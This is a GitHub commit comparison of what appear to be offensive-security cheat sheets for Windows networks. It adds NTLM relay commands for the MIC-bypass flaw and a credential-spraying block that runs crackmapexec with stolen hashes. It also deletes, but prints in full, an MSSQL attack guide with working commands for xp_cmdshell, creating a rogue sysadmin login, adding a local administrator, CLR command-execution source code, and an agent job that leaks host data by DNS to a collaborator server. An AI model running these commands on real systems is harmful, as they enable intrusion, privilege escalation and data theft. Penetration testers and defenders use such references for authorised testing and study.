Compare commits
8 Commits
7d71c5c4fa
...
a8b40ed804
Author | SHA1 | Date |
---|---|---|
NoPurposeInLife | a8b40ed804 | |
Swissky | 8c4d5ad3ae | |
Swissky | 56c56120b4 | |
Swissky | 20b912b3a0 | |
Swissky | 255aaec399 | |
Swissky | 978e8b336b | |
Swissky | bf3c6c4875 | |
NoPurposeInLife | 2143a1a52e |
|
@ -124,7 +124,7 @@ impacket-ntlmrelayx -ip 10.10.10.1 -wh $attacker_ip -t ldaps://10.10.10.2
|
|||
```
|
||||
|
||||
|
||||
## Drop the MIC
|
||||
## Drop the MIC - CVE-2019-1040
|
||||
|
||||
> The CVE-2019-1040 vulnerability makes it possible to modify the NTLM authentication packets without invalidating the authentication, and thus enabling an attacker to remove the flags which would prevent relaying from SMB to LDAP
|
||||
|
||||
|
@ -157,6 +157,20 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
|
|||
```
|
||||
|
||||
|
||||
## Drop the MIC 2 - CVE-2019-1166
|
||||
|
||||
> A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle attacker is able to successfully bypass the NTLM MIC (Message Integrity Check) protection. An attacker who successfully exploited this vulnerability could gain the ability to downgrade NTLM security features. To exploit this vulnerability, the attacker would need to tamper with the NTLM exchange. The attacker could then modify flags of the NTLM packet without invalidating the signature.
|
||||
|
||||
* Unset the signing flags in the `NTLM_NEGOTIATE` message (`NTLMSSP_NEGOTIATE_ALWAYS_SIGN`, `NTLMSSP_NEGOTIATE_SIGN`)
|
||||
* Inject a rogue msvAvFlag field in the `NTLM_CHALLENGE` message with a value of zeros
|
||||
* Remove the MIC from the `NTLM_AUTHENTICATE` message
|
||||
* Unset the following flags in the `NTLM_AUTHENTICATE` message: `NTLMSSP_NEGOTIATE_ALWAYS_SIGN`, `NTLMSSP_NEGOTIATE_SIGN`, `NEGOTIATE_KEY_EXCHANGE`, `NEGOTIATE_VERSION`.
|
||||
|
||||
```ps1
|
||||
ntlmrelayx.py -t ldap://dc.domain.com --escalate-user 'youruser$' -smb2support --remove-mic --delegate-access
|
||||
```
|
||||
|
||||
|
||||
## Ghost Potato - CVE-2019-1384
|
||||
|
||||
Requirements:
|
||||
|
@ -288,9 +302,10 @@ pyrdp-mitm.py <IP> -k private_key.pem -c certificate.pem # with custom key and c
|
|||
|
||||
## References
|
||||
|
||||
* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials)
|
||||
* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/)
|
||||
* [Lateral Movement – WebClient](https://pentestlab.blog/2021/10/20/lateral-movement-webclient/)
|
||||
* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic)
|
||||
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
|
||||
* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema - June 13, 2019](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/)
|
||||
* [Lateral Movement – WebClient](https://pentestlab.blog/2021/10/20/lateral-movement-webclient/)
|
||||
* [NTLM Relaying to LDAP - The Hail Mary of Network Compromise - @logangoins - July 23, 2024](https://logan-goins.com/2024-07-23-ldap-relay/)
|
||||
* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials)
|
||||
* [Relay Your Heart Away: An OPSEC-Conscious Approach to 445 Takeover - Nick Powers - 07/27/2024](https://www.youtube.com/watch?v=iBqOOkQGJEA)
|
||||
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher - Mar 9, 2018](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
|
|
@ -68,6 +68,30 @@ Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
|
|||
ncrack –connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
|
||||
```
|
||||
|
||||
## Spray passwords against everything
|
||||
* Using [crackmapexec](https://github.com/byt3bl33d3r/CrackMapExec)
|
||||
```
|
||||
> Take Administrator Password from mimikatz and secretsdump.py (Make sure you copy and save all the hash into hashes.txt)
|
||||
proxychains4 -q -f /etc/proxychains_9052.conf python secretsdump.py -hashes :077a55c458dc4002dfdc5321a7659526 EXAMPLE.COM/Administrator@sql01.example.com
|
||||
|
||||
echo "" >> users.txt
|
||||
echo "Administrator" >> users.txt
|
||||
echo "Guest" >> users.txt
|
||||
echo "DefaultAccount" >> users.txt
|
||||
echo "WDAGUtilityAccount" >> users.txt
|
||||
proxychains4 -q ./cme ssh --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
|
||||
proxychains4 -q ./cme smb --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
|
||||
proxychains4 -q ./cme winrm --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
|
||||
proxychains4 -q ./cme rdp --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
|
||||
proxychains4 -q ./cme mssql --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
|
||||
proxychains4 -q ./cme ldap --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
|
||||
proxychains4 -q ./cme ssh --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
|
||||
proxychains4 -q ./cme smb --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
|
||||
proxychains4 -q ./cme winrm --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
|
||||
proxychains4 -q ./cme rdp --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
|
||||
proxychains4 -q ./cme mssql --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
|
||||
proxychains4 -q ./cme ldap --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
|
||||
```
|
||||
|
||||
## BadPwdCount attribute
|
||||
|
||||
|
|
|
@ -1,724 +0,0 @@
|
|||
# MSSQL Server
|
||||
|
||||
## Summary
|
||||
|
||||
- [MSSQL Server](#mssql-server)
|
||||
- [Summary](#summary)
|
||||
- [Tools](#tools)
|
||||
- [Identify Instances and Databases](#identify-instances-and-databases)
|
||||
- [Discover Local SQL Server Instances](#discover-local-sql-server-instances)
|
||||
- [Discover Domain SQL Server Instances](#discover-domain-sql-server-instances)
|
||||
- [Discover Remote SQL Server Instances](#discover-remote-sql-server-instances)
|
||||
- [Identify Encrypted databases](#identify-encrypted-databases)
|
||||
- [Version Query](#version-query)
|
||||
- [Identify Sensitive Information](#identify-sensitive-information)
|
||||
- [Get Tables from a Specific Database](#get-tables-from-a-specific-database)
|
||||
- [Gather 5 Entries from Each Column](#gather-5-entries-from-each-column)
|
||||
- [Gather 5 Entries from a Specific Table](#gather-5-entries-from-a-specific-table)
|
||||
- [Dump common information from server to files](#dump-common-information-from-server-to-files)
|
||||
- [Linked Database](#linked-database)
|
||||
- [Find Trusted Link](#find-trusted-link)
|
||||
- [Execute Query Through The Link](#execute-query-through-the-link)
|
||||
- [Crawl Links for Instances in the Domain](#crawl-links-for-instances-in-the-domain)
|
||||
- [Crawl Links for a Specific Instance](#crawl-links-for-a-specific-instance)
|
||||
- [Query Version of Linked Database](#query-version-of-linked-database)
|
||||
- [Execute Procedure on Linked Database](#execute-procedure-on-linked-database)
|
||||
- [Determine Names of Linked Databases](#determine-names-of-linked-databases)
|
||||
- [Determine All the Tables Names from a Selected Linked Database](#determine-all-the-tables-names-from-a-selected-linked-database)
|
||||
- [Gather the Top 5 Columns from a Selected Linked Table](#gather-the-top-5-columns-from-a-selected-linked-table)
|
||||
- [Gather Entries from a Selected Linked Column](#gather-entries-from-a-selected-linked-column)
|
||||
- [Command Execution via xp\_cmdshell](#command-execution-via-xp_cmdshell)
|
||||
- [Extended Stored Procedure](#extended-stored-procedure)
|
||||
- [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures)
|
||||
- [CLR Assemblies](#clr-assemblies)
|
||||
- [Execute commands using CLR assembly](#execute-commands-using-clr-assembly)
|
||||
- [Manually creating a CLR DLL and importing it](#manually-creating-a-clr-dll-and-importing-it)
|
||||
- [OLE Automation](#ole-automation)
|
||||
- [Execute commands using OLE automation procedures](#execute-commands-using-ole-automation-procedures)
|
||||
- [Agent Jobs](#agent-jobs)
|
||||
- [Execute commands through SQL Agent Job service](#execute-commands-through-sql-agent-job-service)
|
||||
- [List All Jobs](#list-all-jobs)
|
||||
- [External Scripts](#external-scripts)
|
||||
- [Python](#python)
|
||||
- [R](#r)
|
||||
- [Audit Checks](#audit-checks)
|
||||
- [Find and exploit impersonation opportunities](#find-and-exploit-impersonation-opportunities)
|
||||
- [Find databases that have been configured as trustworthy](#find-databases-that-have-been-configured-as-trustworthy)
|
||||
- [Manual SQL Server Queries](#manual-sql-server-queries)
|
||||
- [Query Current User \& determine if the user is a sysadmin](#query-current-user--determine-if-the-user-is-a-sysadmin)
|
||||
- [Current Role](#current-role)
|
||||
- [Current DB](#current-db)
|
||||
- [List all tables](#list-all-tables)
|
||||
- [List all databases](#list-all-databases)
|
||||
- [All Logins on Server](#all-logins-on-server)
|
||||
- [All Database Users for a Database](#all-database-users-for-a-database)
|
||||
- [List All Sysadmins](#list-all-sysadmins)
|
||||
- [List All Database Roles](#list-all-database-roles)
|
||||
- [Effective Permissions from the Server](#effective-permissions-from-the-server)
|
||||
- [Effective Permissions from the Database](#effective-permissions-from-the-database)
|
||||
- [Find SQL Server Logins Which can be Impersonated for the Current Database](#find-sql-server-logins-which-can-be-impersonated-for-the-current-database)
|
||||
- [Exploiting Impersonation](#exploiting-impersonation)
|
||||
- [Exploiting Nested Impersonation](#exploiting-nested-impersonation)
|
||||
- [MSSQL Accounts and Hashes](#mssql-accounts-and-hashes)
|
||||
- [References](#references)
|
||||
|
||||
## Tools
|
||||
|
||||
* [NetSPI/PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) - A PowerShell Toolkit for Attacking SQL Server
|
||||
* [skahwah/SQLRecon](https://github.com/skahwah/SQLRecon/) - A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation.
|
||||
|
||||
|
||||
## Identify Instances and Databases
|
||||
|
||||
### Discover Local SQL Server Instances
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceLocal
|
||||
```
|
||||
|
||||
|
||||
### Discover Domain SQL Server Instances
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceDomain -Verbose
|
||||
# Get Server Info for Found Instances
|
||||
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
|
||||
# Get Database Names
|
||||
Get-SQLInstanceDomain | Get-SQLDatabase -NoDefaults
|
||||
```
|
||||
|
||||
### Discover Remote SQL Server Instances
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceBroadcast -Verbose
|
||||
Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1
|
||||
```
|
||||
|
||||
### Identify Encrypted databases
|
||||
Note: These are automatically decrypted for admins
|
||||
|
||||
|
||||
```ps1
|
||||
Get-SQLDatabase -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Verbose | Where-Object {$_.is_encrypted -eq "True"}
|
||||
```
|
||||
|
||||
### Version Query
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceDomain | Get-Query "select @@version"
|
||||
```
|
||||
|
||||
## Identify Sensitive Information
|
||||
|
||||
### Get Tables from a Specific Database
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceDomain | Get-SQLTable -DatabaseName <DBNameFromGet-SQLDatabaseCommand> -NoDefaults
|
||||
Get Column Details from a Table
|
||||
Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName <DBName> -TableName <TableName>
|
||||
```
|
||||
|
||||
|
||||
### Gather 5 Entries from Each Column
|
||||
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceDomain | Get-SQLColumnSampleData -Keywords "<columnname1,columnname2,columnname3,columnname4,columnname5>" -Verbose -SampleSize 5
|
||||
```
|
||||
|
||||
### Gather 5 Entries from a Specific Table
|
||||
|
||||
|
||||
```ps1
|
||||
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query 'select TOP 5 * from <DatabaseName>.dbo.<TableName>'
|
||||
```
|
||||
|
||||
|
||||
### Dump common information from server to files
|
||||
|
||||
```ps1
|
||||
Invoke-SQLDumpInfo -Verbose -Instance SQLSERVER1\Instance1 -csv
|
||||
```
|
||||
|
||||
## Linked Database
|
||||
|
||||
### Find Trusted Link
|
||||
|
||||
|
||||
```sql
|
||||
select * from master..sysservers
|
||||
```
|
||||
|
||||
|
||||
### Execute Query Through The Link
|
||||
|
||||
```sql
|
||||
-- execute query through the link
|
||||
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
|
||||
select version from openquery("linkedserver", 'select @@version as version');
|
||||
|
||||
-- chain multiple openquery
|
||||
select version from openquery("link1",'select version from openquery("link2","select @@version as version")')
|
||||
|
||||
-- execute shell commands
|
||||
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
|
||||
select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
|
||||
|
||||
-- create user and give admin privileges
|
||||
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
|
||||
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
|
||||
```
|
||||
|
||||
### Crawl Links for Instances in the Domain
|
||||
|
||||
A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results
|
||||
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceDomain | Get-SQLServerLink -Verbose
|
||||
select * from master..sysservers
|
||||
```
|
||||
|
||||
|
||||
### Crawl Links for a Specific Instance
|
||||
|
||||
```ps1
|
||||
Get-SQLServerLinkCrawl -Instance "<DBSERVERNAME\DBInstance>" -Verbose
|
||||
select * from openquery("<instance>",'select * from openquery("<instance2>",''select * from master..sysservers'')')
|
||||
```
|
||||
|
||||
|
||||
### Query Version of Linked Database
|
||||
|
||||
```ps1
|
||||
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DBSERVERNAME\DBInstance>`",'select @@version')" -Verbose
|
||||
```
|
||||
|
||||
|
||||
### Execute Procedure on Linked Database
|
||||
|
||||
```ps1
|
||||
SQL> EXECUTE('EXEC sp_configure ''show advanced options'',1') at "linked.database.local";
|
||||
SQL> EXECUTE('RECONFIGURE') at "linked.database.local";
|
||||
SQL> EXECUTE('EXEC sp_configure ''xp_cmdshell'',1;') at "linked.database.local";
|
||||
SQL> EXECUTE('RECONFIGURE') at "linked.database.local";
|
||||
SQL> EXECUTE('exec xp_cmdshell whoami') at "linked.database.local";
|
||||
```
|
||||
|
||||
|
||||
### Determine Names of Linked Databases
|
||||
|
||||
> tempdb, model ,and msdb are default databases usually not worth looking into. Master is also default but may have something and anything else is custom and definitely worth digging into. The result is DatabaseName which feeds into following query.
|
||||
|
||||
```ps1
|
||||
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select name from sys.databases')" -Verbose
|
||||
```
|
||||
|
||||
|
||||
### Determine All the Tables Names from a Selected Linked Database
|
||||
|
||||
> The result is TableName which feeds into following query
|
||||
|
||||
|
||||
```ps1
|
||||
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select name from <DatabaseNameFromPreviousCommand>.sys.tables')" -Verbose
|
||||
```
|
||||
|
||||
|
||||
### Gather the Top 5 Columns from a Selected Linked Table
|
||||
|
||||
> The results are ColumnName and ColumnValue which feed into following query
|
||||
|
||||
|
||||
```ps1
|
||||
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select TOP 5 * from <DatabaseNameFromPreviousCommand>.dbo.<TableNameFromPreviousCommand>')" -Verbose
|
||||
```
|
||||
|
||||
### Gather Entries from a Selected Linked Column
|
||||
|
||||
|
||||
```ps1
|
||||
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`"'select * from <DatabaseNameFromPreviousCommand>.dbo.<TableNameFromPreviousCommand> where <ColumnNameFromPreviousCommand>=<ColumnValueFromPreviousCommand>')" -Verbose
|
||||
```
|
||||
|
||||
|
||||
## Command Execution via xp_cmdshell
|
||||
|
||||
> xp_cmdshell disabled by default since SQL Server 2005
|
||||
|
||||
```ps1
|
||||
PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command whoami
|
||||
|
||||
# Creates and adds local user backup to the local administrators group:
|
||||
PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "net user backup Password1234 /add'" -Verbose
|
||||
PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "net localgroup administrators backup /add" -Verbose
|
||||
```
|
||||
|
||||
* Manually execute the SQL query
|
||||
```sql
|
||||
EXEC xp_cmdshell "net user";
|
||||
EXEC master..xp_cmdshell 'whoami'
|
||||
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
|
||||
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
|
||||
```
|
||||
* If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
|
||||
```sql
|
||||
EXEC sp_configure 'show advanced options',1;
|
||||
RECONFIGURE;
|
||||
EXEC sp_configure 'xp_cmdshell',1;
|
||||
RECONFIGURE;
|
||||
```
|
||||
* If the procedure was uninstalled
|
||||
```sql
|
||||
sp_addextendedproc 'xp_cmdshell','xplog70.dll'
|
||||
```
|
||||
|
||||
|
||||
## Extended Stored Procedure
|
||||
|
||||
### Add the extended stored procedure and list extended stored procedures
|
||||
|
||||
```ps1
|
||||
# Create evil DLL
|
||||
Create-SQLFileXpDll -OutFile C:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp_test
|
||||
|
||||
# Load the DLL and call xp_test
|
||||
Get-SQLQuery -UserName sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Query "sp_addextendedproc 'xp_test', '\\10.10.0.1\temp\test.dll'"
|
||||
Get-SQLQuery -UserName sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Query "EXEC xp_test"
|
||||
|
||||
# Listing existing
|
||||
Get-SQLStoredProcedureXP -Instance "<DBSERVERNAME\DBInstance>" -Verbose
|
||||
```
|
||||
|
||||
* Build a DLL using [xp_evil_template.cpp](https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/xp_evil_template.cpp)
|
||||
* Load the DLL
|
||||
```sql
|
||||
-- can also be loaded from UNC path or Webdav
|
||||
sp_addextendedproc 'xp_calc', 'C:\mydll\xp_calc.dll'
|
||||
EXEC xp_calc
|
||||
sp_dropextendedproc 'xp_calc'
|
||||
```
|
||||
|
||||
|
||||
## CLR Assemblies
|
||||
|
||||
Prerequisites:
|
||||
|
||||
* sysadmin privileges
|
||||
* CREATE ASSEMBLY permission (or)
|
||||
* ALTER ASSEMBLY permission (or)
|
||||
|
||||
The execution takes place with privileges of the **service account**.
|
||||
|
||||
|
||||
### Execute commands using CLR assembly
|
||||
|
||||
```ps1
|
||||
# Create C# code for the DLL, the DLL and SQL query with DLL as hexadecimal string
|
||||
Create-SQLFileCLRDll -ProcedureName "runcmd" -OutFile runcmd -OutDir C:\Users\user\Desktop
|
||||
|
||||
# Execute command using CLR assembly
|
||||
Invoke-SQLOSCmdCLR -Username sa -Password <password> -Instance <instance> -Command "whoami" -Verbose
|
||||
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "whoami" Verbose
|
||||
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64>" -Verbose
|
||||
|
||||
# List all the stored procedures added using CLR
|
||||
Get-SQLStoredProcedureCLR -Instance <instance> -Verbose
|
||||
```
|
||||
|
||||
|
||||
### Manually creating a CLR DLL and importing it
|
||||
|
||||
Create a C# DLL file with the following content, with the command : `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\cmd_exec.cs`
|
||||
|
||||
```csharp
|
||||
using System;
|
||||
using System.Data;
|
||||
using System.Data.SqlClient;
|
||||
using System.Data.SqlTypes;
|
||||
using Microsoft.SqlServer.Server;
|
||||
using System.IO;
|
||||
using System.Diagnostics;
|
||||
using System.Text;
|
||||
|
||||
public partial class StoredProcedures
|
||||
{
|
||||
[Microsoft.SqlServer.Server.SqlProcedure]
|
||||
public static void cmd_exec (SqlString execCommand)
|
||||
{
|
||||
Process proc = new Process();
|
||||
proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe";
|
||||
proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value);
|
||||
proc.StartInfo.UseShellExecute = false;
|
||||
proc.StartInfo.RedirectStandardOutput = true;
|
||||
proc.Start();
|
||||
|
||||
// Create the record and specify the metadata for the columns.
|
||||
SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000));
|
||||
|
||||
// Mark the beginning of the result set.
|
||||
SqlContext.Pipe.SendResultsStart(record);
|
||||
|
||||
// Set values for each column in the row
|
||||
record.SetString(0, proc.StandardOutput.ReadToEnd().ToString());
|
||||
|
||||
// Send the row back to the client.
|
||||
SqlContext.Pipe.SendResultsRow(record);
|
||||
|
||||
// Mark the end of the result set.
|
||||
SqlContext.Pipe.SendResultsEnd();
|
||||
|
||||
proc.WaitForExit();
|
||||
proc.Close();
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
Then follow these instructions:
|
||||
|
||||
1. Enable `show advanced options` on the server
|
||||
```sql
|
||||
sp_configure 'show advanced options',1;
|
||||
RECONFIGURE
|
||||
GO
|
||||
```
|
||||
2. Enable CLR on the server
|
||||
```sql
|
||||
sp_configure 'clr enabled',1
|
||||
RECONFIGURE
|
||||
GO
|
||||
```
|
||||
3. Trust the assembly by adding its SHA512 hash
|
||||
```sql
|
||||
EXEC sys.sp_add_trusted_assembly 0x[SHA512], N'assembly';
|
||||
```
|
||||
4. Import the assembly
|
||||
```sql
|
||||
CREATE ASSEMBLY my_assembly
|
||||
FROM 'c:\temp\cmd_exec.dll'
|
||||
WITH PERMISSION_SET = UNSAFE;
|
||||
```
|
||||
5. Link the assembly to a stored procedure
|
||||
```sql
|
||||
CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec];
|
||||
GO
|
||||
```
|
||||
6. Execute and clean
|
||||
```sql
|
||||
cmd_exec "whoami"
|
||||
DROP PROCEDURE cmd_exec
|
||||
DROP ASSEMBLY my_assembly
|
||||
```
|
||||
|
||||
**CREATE ASSEMBLY** will also accept an hexadecimal string representation of a CLR DLL
|
||||
|
||||
```sql
|
||||
CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM
|
||||
0x4D5A90000300000004000000F[TRUNCATED]
|
||||
WITH PERMISSION_SET = UNSAFE
|
||||
GO
|
||||
```
|
||||
|
||||
|
||||
## OLE Automation
|
||||
|
||||
* :warning: Disabled by default
|
||||
* The execution takes place with privileges of the **service account**.
|
||||
|
||||
|
||||
### Execute commands using OLE automation procedures
|
||||
|
||||
```ps1
|
||||
Invoke-SQLOSCmdOle -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "whoami" Verbose
|
||||
```
|
||||
|
||||
```ps1
|
||||
# Enable OLE Automation
|
||||
EXEC sp_configure 'show advanced options', 1
|
||||
EXEC sp_configure reconfigure
|
||||
EXEC sp_configure 'OLE Automation Procedures', 1
|
||||
EXEC sp_configure reconfigure
|
||||
|
||||
# Execute commands
|
||||
DECLARE @execmd INT
|
||||
EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT
|
||||
EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c'
|
||||
```
|
||||
|
||||
|
||||
```powershell
|
||||
# https://github.com/blackarrowsec/mssqlproxy/blob/master/mssqlclient.py
|
||||
python3 mssqlclient.py 'host/username:password@10.10.10.10' -install -clr Microsoft.SqlServer.Proxy.dll
|
||||
python3 mssqlclient.py 'host/username:password@10.10.10.10' -check -reciclador 'C:\windows\temp\reciclador.dll'
|
||||
python3 mssqlclient.py 'host/username:password@10.10.10.10' -start -reciclador 'C:\windows\temp\reciclador.dll'
|
||||
SQL> enable_ole
|
||||
SQL> upload reciclador.dll C:\windows\temp\reciclador.dll
|
||||
```
|
||||
|
||||
|
||||
## Agent Jobs
|
||||
|
||||
* The execution takes place with privileges of the **SQL Server Agent service account** if a proxy account is not configured.
|
||||
* :warning: Require **sysadmin** or **SQLAgentUserRole**, **SQLAgentReaderRole**, and **SQLAgentOperatorRole** roles to create a job.
|
||||
|
||||
|
||||
|
||||
### Execute commands through SQL Agent Job service
|
||||
|
||||
```ps1
|
||||
Invoke-SQLOSCmdAgentJob -Subsystem PowerShell -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell e <base64encodedscript>" -Verbose
|
||||
Subsystem Options:
|
||||
–Subsystem CmdExec
|
||||
-SubSystem PowerShell
|
||||
–Subsystem VBScript
|
||||
–Subsystem Jscript
|
||||
```
|
||||
|
||||
```sql
|
||||
USE msdb;
|
||||
EXEC dbo.sp_add_job @job_name = N'test_powershell_job1';
|
||||
EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'$name=$env:COMPUTERNAME[10];nslookup "$name.redacted.burpcollaborator.net"', @retry_attempts = 1, @retry_interval = 5 ;
|
||||
EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1';
|
||||
EXEC dbo.sp_start_job N'test_powershell_job1';
|
||||
|
||||
-- delete
|
||||
EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1';
|
||||
```
|
||||
|
||||
|
||||
### List All Jobs
|
||||
|
||||
```ps1
|
||||
SELECT job_id, [name] FROM msdb.dbo.sysjobs;
|
||||
SELECT job.job_id, notify_level_email, name, enabled, description, step_name, command, server, database_name FROM msdb.dbo.sysjobs job INNER JOIN msdb.dbo.sysjobsteps steps ON job.job_id = steps.job_id
|
||||
Get-SQLAgentJob -Instance "<DBSERVERNAME\DBInstance>" -username sa -Password Password1234 -Verbose
|
||||
```
|
||||
|
||||
|
||||
## External Scripts
|
||||
|
||||
Requirements:
|
||||
|
||||
* Feature 'Advanced Analytics Extensions' must be installed
|
||||
* Enable **external scripts**.
|
||||
|
||||
```sql
|
||||
sp_configure 'external scripts enabled', 1;
|
||||
RECONFIGURE;
|
||||
```
|
||||
|
||||
|
||||
### Python
|
||||
|
||||
```ps1
|
||||
Invoke-SQLOSCmdPython -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose
|
||||
|
||||
EXEC sp_execute_external_script @language =N'Python',@script=N'import subprocess p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE) OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])'
|
||||
WITH RESULT SETS (([cmd_out] nvarchar(max)))
|
||||
```
|
||||
|
||||
|
||||
### R
|
||||
|
||||
```ps1
|
||||
Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose
|
||||
|
||||
EXEC sp_execute_external_script @language=N'R',@script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))'
|
||||
WITH RESULT SETS (([cmd_out] text));
|
||||
GO
|
||||
|
||||
@script=N'OutputDataSet <-data.frame(shell("dir",intern=T))'
|
||||
```
|
||||
|
||||
|
||||
## Audit Checks
|
||||
|
||||
|
||||
### Find and exploit impersonation opportunities
|
||||
|
||||
* Impersonate as: `EXECUTE AS LOGIN = 'sa'`
|
||||
* Impersonate `dbo` with DB_OWNER
|
||||
```sql
|
||||
SQL> select is_member('db_owner');
|
||||
SQL> execute as user = 'dbo'
|
||||
SQL> SELECT is_srvrolemember('sysadmin')
|
||||
```
|
||||
|
||||
```ps1
|
||||
Invoke-SQLAuditPrivImpersonateLogin -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Exploit -Verbose
|
||||
|
||||
# impersonate sa account
|
||||
powerpick Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "EXECUTE AS LOGIN = 'sa'; SELECT IS_SRVROLEMEMBER(''sysadmin'')" -Verbose -Debug
|
||||
```
|
||||
|
||||
|
||||
## Find databases that have been configured as trustworthy
|
